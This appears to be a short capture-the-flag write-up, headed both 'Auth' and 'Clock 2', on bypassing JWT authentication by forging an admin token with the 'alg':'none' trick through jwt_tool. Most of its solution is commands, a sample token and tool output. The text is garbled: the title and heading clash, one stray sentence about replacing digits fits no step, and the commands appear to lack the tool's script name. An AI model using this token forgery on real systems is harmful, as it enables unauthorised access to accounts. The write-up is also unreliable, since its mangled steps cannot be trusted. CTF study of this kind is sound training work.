Skip to main content
  1. Writeups/

BucketCTF 2023 - Auth

2 mins· 0 · 0 ·
web BucketCTF 2023
Table of Contents
BucketCTF 2023 - This article is part of a series.
Part 2: This Article
Clock 2>

Clock 2 #


Description #

I just started learning about a new authentication method called JWT. This is my first website with it, could you check if its secure?



As the description indicates, we will certainly have to exploit a JWT vulnerability, on the website there is a /register page which allows us to register and thus be able to have JWT tokens for our account.

However no route accessible by default allows us to provide a JWT token to the server.

So we just have to find a route or a way to send a JWT token to the server to be able to try to bypass this authentication.


Solution #

First i ran a gobuster on the website to see if there is a page where we can provide a JWT token.

The /info route lead to a /validate route needing a token as a GET parameter.

We will now try to exploit the JWT token with the jwt_tool fork of dillonfrank to have a support of GET parameters :

Then i replaced [0-4] with 0 and [5-9] with 1.

~$ python3 -M at -t "" -gd "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3QyIiwiaWF0IjoxNjgwOTk2ODgyfQ.2qodlmGmM19ZFZE-aCWb1FyC9YNiHwxrRw2Bu3WX840" -I -pc username -pv admin

jwttool_e0e5c45b9f118f38e4bccbf97821f92e Exploit: "alg":"none" (-X a) Response Code: 200, 37 bytes

~$ python3 -Q "jwttool_e0e5c45b9f118f38e4bccbf97821f92e"

We can see that the server return a 200 with a none algorithm, we can just query the result and we get the flag.


Flag #


BucketCTF 2023 - This article is part of a series.
Part 2: This Article